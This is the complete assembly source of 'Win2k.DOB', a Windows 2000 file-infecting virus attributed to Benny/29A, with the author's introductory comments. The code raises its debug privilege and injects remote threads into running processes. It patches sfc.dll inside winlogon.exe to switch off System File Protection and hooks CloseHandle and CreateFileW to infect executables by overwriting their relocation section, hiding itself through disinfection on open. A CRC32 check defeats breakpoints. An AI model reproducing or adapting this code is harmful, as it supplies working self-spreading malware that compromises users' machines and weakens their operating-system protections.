Virus.Win2k.DOB - Source Code


COMMENT#

                           ��������������������������¿
                           ��������������������������Ŵ
                           ��������������������������Ŵ
                           ���Ŵ    Win2k.DOB     ���Ŵ
                           ���Ŵ   by Benny/29A   ���Ŵ
                           ��������������������������Ŵ
                           ��������������������������Ŵ
                           ����������������������������


Hello dear reader,

here is my another Win2k infector. This one is multi-process resident and featurez
some small kind of stealth and runtime SFP disabling! The main viral code worx with
all processes in the system and tries to inflitrate them. IF the process in
winlogon.exe, it createz remote thread which will overwrite code that handlez System
File Protection in Windows 2000. There's no need to restart computer, from the
execution ALL filez protected by SFP are now unprotected! I used the same method
which is described in article about SFC disabling in 29A-6 magazine. I have to
mentioned that this code is coded by me and also Ratter of 29A.

In the case the found process is not winlogon.exe it triez to create remote thread
which will hook CloseHandle and CreateFileW APIZ there. The mentioned semi-stealth
mechanism worx in this way - when infected program tries to open infected file with
CreateFileW API, virus will disinfect it and pass the execution to the API and host.
When host program tries to close file by CloseHandle API, virus will try to infect
it by my favourite method - overwritting of relocation section. I had this semi-stealth
mechanism (semi becoz infection via CloseHandle doesnt always work - file is not alwayz
opened with all required access rightz so many timez the infection will fail - and for now
I dont know how to recieve filename from HANDLE by Win2k compatible way. If anyone knows
it, pleaz gimme know!) for long yearz in my head. Originaly I wanted to implement it
in Win32.Vulcano, but I was so lazy... I decided to code it now, well I know its a bit
later, but better later than never :)

Virus also chex its own integrity on the start (by CRC32) so in the case someone set
some breakpointz in the viral code, virus will not run.

I didnt test Win2k.DOB very deeply, so it is possible that it has some bugz. However,
again I didnt code it for spreading, but to show some new ideaz. I hope you will like
this virus...


(c)oded in September, 2001
Czech Republic.
#


.386p
.model  flat

include win32api.inc
include useful.inc
include mz.inc
include pe.inc


invoke  macro   api             ;macro for API callz
    extrn   api:PROC            ;declare API
    call    api             ;call it...
endm


@SEH_SetupFrame_UnProtect   macro
    local   set_new_eh
    local   exception_handler
    local   @n

    call    set_new_eh
    pushad

    mov ebx,dword ptr [esp+cPushad+EH_ExceptionRecord]
    cmp dword ptr [ebx.ER_ExceptionCode],EXCEPTION_ACCESS_VIOLATION
        jne exception_handler

    call    @n
    dd  ?
@n: mov ebx,[ebx.ER_ExceptionInformation+4]
    push    PAGE_READWRITE
    and ebx,0FFFFF000h
    push    2*4096
    push    ebx
    mov eax,12345678h
_VirtualProtect = dword ptr $-4
    call    eax             ;unprotect 2 pagez

exception_handler:
    popad
    xor eax,eax
    ret

set_new_eh:                 ;set SEH frame
    xor edx,edx
    push    dword ptr fs:[edx]
    mov fs:[edx],esp
endm


.data


;this is the remote thread that getz executed in infected process

rtStart Proc
    pushad
tdelta = $+5
    @SEH_SetupFrame <jmp    end_thread>

    mov ebp,[esp+4]         ;EBP = delta offset

    ;hook 2 APIz - CloseHandle and CreateFileW

    mov esi,12345678h
_CloseHandle = dword ptr $-4
    cmp [esi],64EC8B55h         ;check CloseHandle API...
    jne try_cfw
    cmp dword ptr [esi+4],000018A1h ;...code
    jne try_cfw
    mov eax,esi
    neg esi
    add esi,newCloseHandle-rtStart-5
    add esi,12345678h
virus_base = dword ptr $-4
    mov byte ptr [eax],0E9h     ;create "JMP <virus>"
    mov [eax+1],esi
    mov [eax+5],90909090h       ;fill with NOPs
    add eax,9
    mov [ebp + nextCH - tdelta],eax ;save the address

;and do the same for CreateFileW API

try_cfw:mov esi,12345678h
_CreateFileW = dword ptr $-4
    cmp [esi],83EC8B55h
    jne end_thread
    cmp word ptr [esi+4],5CECh
    jne end_thread
    mov eax,esi
    neg esi
    add esi,newCreateFileW-rtStart-5
    add esi,[ebp + virus_base - tdelta]
    mov byte ptr [eax],0E9h
    mov [eax+1],esi
    mov byte ptr [eax+5],90h
    add eax,6
    mov [ebp + nextCFW - tdelta],eax

end_thread:
    @SEH_RemoveFrame
    popad
    ret


;hooker for CreateFileW - disinfectz opened file from virus

newCreateFileW:
    pushad
    call    @oldCFW

    cdelta = $
bytez_CreateFileW:
    push    ebp             ;overwritten code
    mov ebp,esp
    sub esp,5Ch
    push    12345678h           ;return address
nextCFW = dword ptr $-4
    ret

@oldCFW:pop ebp             ;EBP = delta offset

    mov ecx,12345678h
semaphore = dword ptr $-4
    jecxz   c_cfw
    xor eax,eax
    and [ebp + semaphore - cdelta],eax

    call    disinfect           ;try to disinfect the file
    mov [ebp + semaphore - cdelta],ebp
c_cfw:  popad
    jmp bytez_CreateFileW       ;and run the previous code


;hooker for CloseHandle - infectz file which's getting closed

newCloseHandle:
    pushad
    call    @oldCH

    hdelta = $
bytez_CloseHandle:
    push    ebp             ;overwritten code
    mov ebp,esp
    mov eax,LARGE fs:[18h]
    push    12345678h           ;return address
nextCH = dword ptr $-4
    ret

@oldCH: pop ebp             ;EBP = delta offset

    mov ecx,[ebp + semaphore - hdelta]
    jecxz   c_ch
    and dword ptr [ebp + semaphore - hdelta],0

    call    tryInfect           ;try to infect
    mov [ebp + semaphore - hdelta],ebp
c_ch:   popad
    jmp bytez_CloseHandle       ;and run the previous code


tryInfect:
    mov ebx,[esp.cPushad+8]     ;get the handle
    push    ebx
    mov eax,12345678h
_GetFileType = dword ptr $-4
    call    eax
    dec eax
    je  c_ti                ;must be FILE_TYPE_DISK
end_ti: ret

c_ti:   push    eax
    push    eax
    push    eax
    push    PAGE_READWRITE
    push    eax
    push    ebx
    mov eax,12345678h
_CreateFileMappingA = dword ptr $-4
    call    eax             ;map the file
    cdq
    xchg    eax,ecx
    jecxz   end_ti
    mov [ebp + hFile - hdelta],ecx

    push    edx
    push    edx
    push    edx
    push    FILE_MAP_WRITE
    push    ecx
    mov eax,12345678h
_MapViewOfFile = dword ptr $-4
    call    eax             ;--- " " ---
    test    eax,eax
    je  close_file
    xchg    eax,ebx
    mov [ebp + lpFile - hdelta],ebx
    jmp n_open

unmap_file:
    push    12345678h
lpFile = dword ptr $-4
    mov eax,12345678h
_UnmapViewOfFile = dword ptr $-4
    call    eax             ;unmap the file
close_file:
    push    12345678h
hFile = dword ptr $-4
    call    [ebp + _CloseHandle - hdelta]   ;--- " " ---
    ret


n_open: mov esi,[ebx.MZ_lfanew]
    add esi,ebx
    mov eax,[esi]
    add eax,-IMAGE_NT_SIGNATURE
    jne unmap_file          ;must be PE file

    ;discard not_executable and system filez
    cmp word ptr [esi.NT_FileHeader.FH_Machine],IMAGE_FILE_MACHINE_I386
    jne unmap_file
    mov ax,[esi.NT_FileHeader.FH_Characteristics]
    test    ax,IMAGE_FILE_EXECUTABLE_IMAGE
    je  unmap_file
    test    ax,IMAGE_FILE_DLL
    jne unmap_file
    test    ax,IMAGE_FILE_SYSTEM
    jne unmap_file
    mov al,byte ptr [esi.NT_FileHeader.OH_Subsystem]
    test    al,IMAGE_SUBSYSTEM_NATIVE
    jne unmap_file

    movzx   eax,word ptr [esi.NT_FileHeader.FH_NumberOfSections]
    dec eax
    test    eax,eax
    je  unmap_file
    imul    eax,eax,IMAGE_SIZEOF_SECTION_HEADER
    movzx   edx,word ptr [esi.NT_FileHeader.FH_SizeOfOptionalHeader]
    lea edi,[eax+edx+IMAGE_SIZEOF_FILE_HEADER+4]
    add edi,esi
    lea edx,[esi.NT_OptionalHeader.OH_DataDirectory.DE_BaseReloc.DD_VirtualAddress]
    mov eax,[edx]
    test    eax,eax
    je  unmap_file
    cmp eax,[edi.SH_VirtualAddress]
    jne unmap_file
    cmp [edi.SH_SizeOfRawData],virtual_end-rtStart
    jb  unmap_file          ;is it large enough?

    pushad
    xor eax,eax
    mov edi,edx
    stosd
    stosd
    popad                   ;erase relocs record

    ;align the section size
    mov eax,virtual_end-rtStart
    cmp eax,[edi.SH_VirtualSize]
    jb  o_vs
    mov ecx,[esi.NT_OptionalHeader.OH_SectionAlignment]
    cdq
    div ecx
    test    edx,edx
    je  o_al
    inc eax
o_al:   mul ecx
    mov [edi.SH_VirtualSize],eax

o_vs:   push    dword ptr [ebp + original_ep - hdelta]

    mov eax,[esi.NT_OptionalHeader.OH_AddressOfEntryPoint]
    mov ecx,[edi.SH_VirtualAddress]
    add ecx,Start-rtStart
    mov [esi.NT_OptionalHeader.OH_AddressOfEntryPoint],ecx
    mov [ebp + original_ep - hdelta],eax
    mov eax,[esi.NT_OptionalHeader.OH_ImageBase]
    add [ebp + original_ep - hdelta],eax
                        ;set saved_entrypoint variable
    pushad
    mov edi,[edi.SH_PointerToRawData]
    add edi,ebx
    lea esi,[ebp + rtStart - hdelta]
    mov ecx,(virtual_end-rtStart+3)/4
    rep movsd               ;overwrite relocs by virus body
    popad
    pop dword ptr [ebp + original_ep - hdelta]
                        ;restore used variablez
    or  dword ptr [edi.SH_Characteristics],IMAGE_SCN_MEM_WRITE
    jmp unmap_file


disinfect:
    push    eax
    push    FILE_ATTRIBUTE_NORMAL
    push    OPEN_EXISTING
    push    eax
    push    FILE_SHARE_READ
    push    GENERIC_READ or GENERIC_WRITE
    push    dword ptr [esp.cPushad+32]
    call    [ebp + _CreateFileW - cdelta]       ;open the file
    inc eax
    jne c_di
    ret

c_di:   dec eax
    mov [ebp + cFile - cdelta],eax
    cdq
    xor edx,edx
    push    edx
    push    edx
    push    edx
    push    PAGE_READWRITE
    push    edx
    push    eax
    call    [ebp + _CreateFileMappingA - cdelta]    ;create file mapping
    cdq
    xchg    eax,ecx
    jecxz   c_close_file
    mov [ebp + cMapFile - cdelta],ecx

    push    edx
    push    edx
    push    edx
    push    FILE_MAP_WRITE
    push    ecx
    call    [ebp + _MapViewOfFile - cdelta]     ;map to address space
    test    eax,eax
    je  c_close_file2
    xchg    eax,ebx
    mov [ebp + clpFile - cdelta],ebx
    jmp n_copen

c_unmap_file:
    push    12345678h
clpFile = dword ptr $-4
    call    [ebp + _UnmapViewOfFile - cdelta]   ;unmap file
c_close_file2:
    push    12345678h
cMapFile = dword ptr $-4
    call    [ebp + _CloseHandle - cdelta]       ;close file mapping
c_close_file:
    push    12345678h
cFile = dword ptr $-4
    call    [ebp + _CloseHandle - cdelta]       ;and the file itself
    ret

n_copen:mov esi,[ebx.MZ_lfanew]
    add esi,ebx
    mov eax,[esi]
    add eax,-IMAGE_NT_SIGNATURE
    jne c_unmap_file            ;must be PE file

    movzx   eax,word ptr [esi.NT_FileHeader.FH_NumberOfSections]
    dec eax
    test    eax,eax
    je  unmap_file
    imul    eax,eax,IMAGE_SIZEOF_SECTION_HEADER
    movzx   edx,word ptr [esi.NT_FileHeader.FH_SizeOfOptionalHeader]
    lea edi,[eax+edx+IMAGE_SIZEOF_FILE_HEADER+4]
    add edi,esi
    cmp [edi],'ler.'
    jne c_unmap_file
    cmp dword ptr [edi+4],'co'
    jne c_unmap_file            ;must be ".reloc"
    lea edx,[esi.NT_OptionalHeader.OH_DataDirectory.DE_BaseReloc.DD_VirtualAddress]
    xor ecx,ecx
    cmp [edx],ecx
    jne c_unmap_file            ;must be NULL
    mov eax,[edi.SH_VirtualAddress]
    mov [edx],eax           ;restore the address field
    mov eax,[edi.SH_VirtualSize]
    mov [edx+4],eax         ;and the size field
    xchg    eax,ecx

    mov ecx,[edi.SH_SizeOfRawData]
    mov edi,[edi.SH_PointerToRawData]
    add edi,ebx

    pushad
    push    esi
    mov esi,edi
    lea edi,[ebp + end_seh - cdelta]
    mov ecx,original_ep-end_seh
l_ep:   pushad
    rep cmpsb
    popad
    je  got_ep
    inc esi
    jmp l_ep
got_ep: add esi,original_ep-end_seh     ;find the saved entrypoint in virus body
    lodsd
    pop esi
    sub eax,[esi.NT_OptionalHeader.OH_ImageBase]
    mov [esi.NT_OptionalHeader.OH_AddressOfEntryPoint],eax
    popad                   ;restore it
    rep stosb               ;and overwrite body with NULLs

    jmp c_unmap_file

rtStart EndP


signature   db  0,'[Win2k.DOB], multi-process stealth project by Benny/29A',0
                        ;little signature ;-)


; !!! VIRAL CODE STARTS HERE !!!

Start:  pushad
gdelta = $+5
    @SEH_SetupFrame <jmp end_seh>       ;setup SEH frame

    call    check_crc32         ;check viral body consistency

protected:
    mov ebp,[esp+4]         ;EBP = delta offset

    mov edx,cs
    xor dl,dl
    jne end_seh             ;must be under winNT/2k!

    call    get_base            ;get K32 base address
    call    get_apiz            ;find addresses of APIz
    call    advapi_apiz         ;get ADVAPI32 apiz
    call    psapi_apiz          ;get PSAPI apiz

    mov eax,12345678h
_GetCurrentProcess = dword ptr $-4
    call    eax             ;get current process pseudohandle
    lea ecx,[ebp + p_token - gdelta]
    push    ecx
    push    20h
    push    eax
    mov eax,12345678h
_OpenProcessToken = dword ptr $-4       ;open token of our process
    call    eax
    dec eax
    jne err_ap

    lea ecx,[ebp + p_luid - gdelta]
    push    ecx
    @pushsz 'SeDebugPrivilege'
    push    eax
    mov eax,12345678h
_LookupPrivilegeValueA = dword ptr $-4      ;find LUID for this priv.
    call    eax
    dec eax
    jne err_ap

    lea ecx,[ebp + token_priv - gdelta]
    push    eax
    push    eax
    push    10h
    push    ecx
    push    eax
    push    dword ptr [ebp + p_token - gdelta]
    mov eax,12345678h
_AdjustTokenPrivileges = dword ptr $-4
    call    eax             ;adjust higher priviledges
                        ;for our process ;-)
err_ap: lea esi,[ebp + procz - gdelta]
    lea eax,[ebp + tmp - gdelta]
    push    eax
    push    80h
    push    esi
    mov eax,12345678h
_EnumProcesses = dword ptr $-4
    call    eax             ;enumerate all running processes
    dec eax
    jne end_seh
    add esi,4

p_search:
    lodsd                   ;get PID
    test    eax,eax
    je  end_ps
    call    analyse_process         ;and try to infect it
    jmp p_search

end_ps: push    12345678h
_advapi32 = dword ptr $-4
    mov esi,12345678h
_FreeLibrary = dword ptr $-4
    call    esi
    push    12345678h
_psapi = dword ptr $-4
    call    esi             ;free ADVAPI32 and PSAPI libz
end_seh:@SEH_RemoveFrame            ;remove SEH frame
    popad

    extrn   ExitProcess:PROC
    push    cs
    push    offset ExitProcess
original_ep = dword ptr $-4
    retf                    ;jump to host!


analyse_process Proc
    pushad
    push    eax
    push    0
    push    43Ah
    mov eax,12345678h
_OpenProcess = dword ptr $-4
    call    eax             ;PID -> handle
    test    eax,eax
    je  end_ap
    mov [ebp + hProcess - gdelta],eax
    push    eax

    push    eax
    lea esi,[ebp + modz - gdelta]
    lea ecx,[ebp + tmp - gdelta]
    push    ecx
    push    4
    push    esi
    push    eax
    mov eax,12345678h
_EnumProcessModules = dword ptr $-4
    call    eax             ;get first (main) module
    pop ecx
    dec eax
    jne end_ap1

    lodsd
    lea edi,[ebp + mod_name - gdelta]
    push    MAX_PATH
    push    edi
    push    eax
    push    ecx
    mov eax,12345678h
_GetModuleBaseNameA = dword ptr $-4
    call    eax             ;get its name
    xchg    eax,ecx
    test    ecx,ecx
    je  end_ap1

    @pushsz 'winlogon.exe'
    pop esi
    mov ebx,edi
    pushad
    rep cmpsb
    popad
    je  r_winlogon          ;is it winlogon?

    ;nope, try to infect the process

    lea esi,[ebp + rtStart - gdelta]
    mov edi,virtual_end-rtStart
    call    r_create_thread
    jmp end_ap1

r_winlogon:

    ;yeah, disable SFP!

    lea esi,[ebp + winlogon_start_rroutine - gdelta]
    mov edi,winlogon_end_rroutine-winlogon_start_rroutine
    call    r_create_thread

end_ap1:call    [ebp + _CloseHandle - gdelta]
end_ap: popad
    ret
analyse_process EndP


;this proc createz remote thread

r_create_thread Proc
        push    PAGE_READWRITE
    push    MEM_RESERVE or MEM_COMMIT
    push    edi
    push    0
    push    12345678h
hProcess = dword ptr $-4
    mov eax,12345678h
_VirtualAllocEx = dword ptr $-4
    call    eax             ;aloc there a memory
    test    eax,eax
    je  err_rcr
    xchg    eax,ebx
    mov [ebp + virus_base - gdelta],ebx

    push    0
    push    edi
    push    esi
    push    ebx
    push    dword ptr [ebp + hProcess - gdelta]
    mov eax,12345678h
_WriteProcessMemory = dword ptr $-4
    call    eax             ;write there our code
    dec eax
    jne free_mem

    lea ecx,[ebp + tmp - gdelta]
    push    ecx
    push    PAGE_READWRITE
    push    1
    push    dword ptr [ebp + _CloseHandle - gdelta]
    push    dword ptr [ebp + hProcess - gdelta]
    mov eax,12345678h
_VirtualProtectEx = dword ptr $-4
    call    eax             ;unprotect first CloseHandle API page
    dec eax
    jne free_mem

    lea ecx,[ebp + tmp - gdelta]
    push    ecx
    push    PAGE_READWRITE
    push    1
    push    dword ptr [ebp + _CreateFileW - gdelta]
    push    dword ptr [ebp + hProcess - gdelta]
    call    [ebp + _VirtualProtectEx - gdelta]  ;unprotect first CreateFileW API page
    dec eax
    jne free_mem

    xor edx,edx
    push    edx
    push    edx
    push    edx
    push    ebx
    push    edx
    push    edx
    push    dword ptr [ebp + hProcess - gdelta]
    mov eax,12345678h
_CreateRemoteThread = dword ptr $-4
    call    eax             ;run remote thread!
    push    eax
    call    [ebp + _CloseHandle - gdelta]
err_rcr:ret
free_mem:
    push    MEM_RELEASE
    push    0
    push    ebx
    push    dword ptr [ebp + hProcess - gdelta]
    mov eax,12345678h
_VirtualFreeEx = dword ptr $-4
    call    eax             ;free memory
    ret
r_create_thread EndP


winlogon_start_rroutine Proc
    pushad

    @SEH_SetupFrame_UnProtect       ;set SEH frame

    @pushsz 'sfc.dll'
    mov eax,12345678h
_GetModuleHandleA = dword ptr $-4
    call    eax             ;get sfc.dll address
    test    eax,eax
    je  end_rseh
    xchg    eax,esi

    mov eax,[esi.MZ_lfanew]
    add eax,esi
    movzx   edx,word ptr [eax.NT_FileHeader.FH_SizeOfOptionalHeader]
    lea edx,[edx+eax+(3*IMAGE_SIZEOF_FILE_HEADER)]
    mov ecx,[edx.SH_SizeOfRawData]  ;get size of section

    call    @s_str
@b_str: db  0FFh,15h,8Ch,12h,93h,76h    ;code to search & patch
    db  85h,0C0h
    db  0Fh,8Ch,0F1h,00h,00h,00h
    db  0Fh,84h,0EBh,00h,00h,00h
    db  3Dh,02h,01h,00h,00h
@s_str: pop edi
s_str:  pushad
    push    @s_str-@b_str
    pop ecx
    rep cmpsb               ;search for code
    popad
    je  got_addr
    inc esi
    loop    s_str
    jmp end_rseh

got_addr:
    call    e_next

s_next: push    0               ;"patch" code
    mov eax,12345678h
_ExitThread = dword ptr $-4
    call    eax

e_next: pop edi
    xchg    esi,edi
    add edi,6
        mov ecx,e_next-s_next
        rep movsb               ;patch sfc.dll code by our code

end_rseh:
    @SEH_RemoveFrame
    popad
    ret                 ;and quit

winlogon_end_rroutine:
winlogon_start_rroutine EndP


;this procedure can retrieve base address of K32
get_base    Proc
    mov eax,077E80000h      ;get lastly used address
last_kern = dword ptr $-4
    call    check_kern      ;is this address valid?
    jecxz   end_gb          ;yeah, we got the address

    call    gb_table        ;jump over the address table
    dd  077E00000h      ;NT/W2k
    dd  077E80000h      ;NT/W2k
    dd  077ED0000h      ;NT/W2k
    dd  077F00000h      ;NT/W2k
    dd  0BFF70000h      ;95/98
gb_table:
    pop edi         ;get pointer to address table
    push    4           ;get number of items in the table
    pop esi         ;to ESI
gbloop: mov eax,[edi+esi*4]     ;get item
    call    check_kern      ;is address valid?
    jecxz   end_gb          ;yeah, we got the valid address
    dec esi         ;decrement ESI
    test    esi,esi         ;end of table?
    jne gbloop          ;nope, try next item

    call    scan_kern       ;scan the address space for K32
end_gb: ret             ;quit

check_kern:             ;check if K32 address is valid
    mov ecx,eax         ;make ECX != 0
    pushad              ;store all registers
    @SEH_SetupFrame <jmp    end_ck> ;setup SEH frame
    movzx   edx,word ptr [eax]  ;get two bytes
    add edx,-"ZM"       ;is it MZ header?
    jne end_ck          ;nope
    mov     ebx,[eax.MZ_lfanew] ;get pointer to PE header
    add ebx,eax         ;normalize it
    mov ebx,[ebx]       ;get four bytes
    add ebx,-"EP"       ;is it PE header?
    jne end_ck          ;nope
    xor ecx,ecx         ;we got K32 base address
    mov [ebp + last_kern - gdelta],eax  ;save K32 base address
end_ck: @SEH_RemoveFrame        ;remove SEH frame
    mov [esp.Pushad_ecx],ecx    ;save ECX
    popad               ;restore all registers
    ret             ;if ECX == 0, address was found

SEH_hndlr macro             ;macro for SEH
        @SEH_RemoveFrame        ;remove SEH frame
    popad               ;restore all registers
        add dword ptr [ebp + bAddr - gdelta],1000h  ;explore next page
        jmp bck         ;continue execution
endm

scan_kern:              ;scan address space for K32
bck:    pushad              ;store all registers
    @SEH_SetupFrame <SEH_hndlr> ;setup SEH frame
    mov eax,077000000h      ;starting/last address
bAddr = dword ptr $-4
    movzx   edx,word ptr [eax]  ;get two bytes
    add edx,-"ZM"       ;is it MZ header?
    jne pg_flt          ;nope
    mov     edi,[eax.MZ_lfanew] ;get pointer to PE header
    add edi,eax         ;normalize it
    mov ebx,[edi]       ;get four bytes
    add ebx,-"EP"       ;is it PE header?
    jne pg_flt          ;nope
    mov ebx,eax
    mov esi,eax
    add ebx,[edi.NT_OptionalHeader.OH_DirectoryEntries.DE_Export.DD_VirtualAddress]
    add esi,[ebx.ED_Name]
    mov esi,[esi]
    add esi,-'NREK'
    je  end_sk
pg_flt: xor ecx,ecx         ;we got K32 base address
    mov [ecx],esi       ;generate PAGE FAULT! search again...
end_sk: mov [ebp + last_kern - gdelta],eax  ;save K32 base address
    @SEH_RemoveFrame        ;remove SEH frame
    mov [esp.Pushad_eax],eax    ;save EAX - K32 base
    popad               ;restore all registers
    ret
get_base    EndP


get_apiz    Proc
    mov esi,eax         ;base of K32
    mov edx,[esi.MZ_lfanew]
    add edx,esi
    mov ebx,[edx.NT_OptionalHeader.OH_DirectoryEntries.DE_Export.DD_VirtualAddress]
    add ebx,esi
    mov ecx,[ebx.ED_NumberOfNames]
    mov edx,[ebx.ED_AddressOfNames]
    add edx,esi

    xor eax,eax
c_find: pushad
    add esi,[edx+eax*4]
    push    esi
    @endsz
    mov edi,esi
    pop esi
    sub edi,esi
    call    CRC32           ;calculate CRC32 of the API

    push    n_apiz          ;number of apiz
    pop ecx

    call    @callz
s_apiz: dd  082B618D4h      ;GetModuleHandleA
    dd  04134D1ADh      ;LoadLibraryA
    dd  0AFDF191Fh      ;FreeLibrary
    dd  0FFC97C1Fh      ;GetProcAddress
    dd  079C3D4BBh      ;VirtualProtect
    dd  0058F9201h      ;ExitThread
    dd  003690E66h      ;GetCurrentProcess
    dd  033D350C4h      ;OpenProcess
    dd  0DA89FC22h      ;VirtualAllocEx
    dd  00E9BBAD5h      ;WriteProcessMemory
    dd  0CF4A7F65h      ;CreateRemoteThread
    dd  0700ED6DFh      ;VirtualFreeEx
    dd  068624A9Dh      ;CloseHandle
    dd  056E1B657h      ;VirtualProtectEx
    dd  000D38F42h      ;GetFileType
    dd  096B2D96Ch      ;CreateFileMappingA
    dd  0797B49ECh      ;MapViewOfFile
    dd  094524B42h      ;UnmapViewOfFile
    dd  090119808h      ;CreateFileW
n_apiz = ($-s_apiz)/4
@callz: pop edx

c_look: cmp [edx-4+(ecx*4)],eax ;is it our API?
    je  got_call        ;yeah
    loop    c_look          ;nope, look for another API in our table
c_out:  popad
    inc eax
    loop    c_find
    ret

got_call:
    mov edx,[ebx.ED_AddressOfOrdinals]
    mov esi,[esp.Pushad_esi]
    add edx,esi
    mov eax,[esp.Pushad_eax]
    movzx   eax,word ptr [edx+eax*2]
    mov edx,esi
    add edx,[ebx.ED_AddressOfFunctions]
    mov eax,[edx+eax*4]
    add eax,esi

    lea edx,[ebp + Start - gdelta]
    add edx,[ebp + api_addr-4+ecx*4 - gdelta]
    mov [edx],eax       ;save it
    jmp c_out
get_apiz    EndP


api_addr:               ;where to save apiz numberz...
    dd  offset _GetModuleHandleA-Start
    dd  offset _LoadLibraryA-Start
    dd  offset _FreeLibrary-Start
    dd  offset _GetProcAddress-Start
    dd  offset _VirtualProtect-Start
    dd  offset _ExitThread-Start
    dd  offset _GetCurrentProcess-Start
    dd  offset _OpenProcess-Start
    dd  offset _VirtualAllocEx-Start
    dd  offset _WriteProcessMemory-Start
    dd  offset _CreateRemoteThread-Start
    dd  offset _VirtualFreeEx-Start
    dd  offset _CloseHandle-Start
    dd  offset _VirtualProtectEx-Start
    dd  offset _GetFileType-Start
    dd  offset _CreateFileMappingA-Start
    dd  offset _MapViewOfFile-Start
    dd  offset _UnmapViewOfFile-Start
    dd  offset _CreateFileW-Start

CRC32:  push    ecx         ;procedure for calculating CRC32s
    push    edx         ;at run-time
    push    ebx
        xor ecx,ecx
        dec ecx
        mov edx,ecx
NextByteCRC:
        xor eax,eax
        xor ebx,ebx
        lodsb
        xor al,cl
    mov cl,ch
    mov ch,dl
    mov dl,dh
    mov dh,8
NextBitCRC:
    shr bx,1
    rcr ax,1
    jnc NoCRC
    xor ax,08320h
    xor bx,0EDB8h
NoCRC:  dec dh
    jnz NextBitCRC
    xor ecx,eax
    xor edx,ebx
        dec edi
    jne NextByteCRC
    not edx
    not ecx
    pop ebx
    mov eax,edx
    rol eax,16
    mov ax,cx
    pop edx
    pop ecx
    ret

;get addressez of ADVAPI32 APIz

advapi_apiz Proc
    @pushsz 'ADVAPI32'
    mov eax,12345678h
_LoadLibraryA = dword ptr $-4
    call    eax         ;load ADVAPI32
    xchg    eax,ebx
    mov [ebp + _advapi32 - gdelta],ebx

    @pushsz 'OpenProcessToken'
    push    ebx
    mov esi,12345678h
_GetProcAddress = dword ptr $-4
    call    esi
    mov [ebp + _OpenProcessToken - gdelta],eax
                    ;save API address
    @pushsz 'LookupPrivilegeValueA'
    push    ebx
    call    esi
    mov [ebp + _LookupPrivilegeValueA - gdelta],eax
                    ;--- " " ---
    @pushsz 'AdjustTokenPrivileges'
    push    ebx
    call    esi
    mov [ebp + _AdjustTokenPrivileges - gdelta],eax
                    ;--- " " ---
    ret
advapi_apiz EndP

;get addressez of PSAPI APIz

psapi_apiz  Proc
    @pushsz 'PSAPI'
    call    [ebp + _LoadLibraryA - gdelta]  ;load PSAPI
    xchg    eax,ebx
    mov [ebp + _psapi - gdelta],ebx
    @pushsz 'EnumProcesses'
    push    ebx
    call    esi
    mov [ebp + _EnumProcesses - gdelta],eax
                    ;save API address
    @pushsz 'EnumProcessModules'
    push    ebx
    call    esi
    mov [ebp + _EnumProcessModules - gdelta],eax
                    ;--- " " ---

    @pushsz 'GetModuleBaseNameA'
    push    ebx
    call    esi
    mov [ebp + _GetModuleBaseNameA - gdelta],eax
                    ;--- " " ---

    @pushsz 'EnumProcesses'
    push    ebx
    call    esi
    mov [ebp + _EnumProcesses - gdelta],eax
                    ;--- " " ---
    ret
psapi_apiz  EndP

token_priv  dd  1
p_luid      dq  ?
        dd  2
procz       dd  80h dup (?)
        dd  ?
modz        dd  ?
mod_name    db  MAX_PATH dup (?)
p_token     dd  ?
tmp     dd  ?

check_crc32:
    pop esi
    mov edi,check_crc32-protected
    call    CRC32               ;calculate CRC32 for viral body
    cmp eax,0D620301Eh
    jne end_seh             ;quit if does not match
    jmp protected
virtual_end:

.code                       ;first generation code
FirstGeneration:

    jmp Start

    ;virtual size of virus
    db  0dh,0ah,'Virus size in memory: '
    db  '0'+((virtual_end-rtStart)/1000) mod 10
    db  '0'+((virtual_end-rtStart)/100) mod 10
    db  '0'+((virtual_end-rtStart)/10) mod 10
    db  '0'+((virtual_end-rtStart)/1) mod 10
    db  0dh,0ah
ends
End FirstGeneration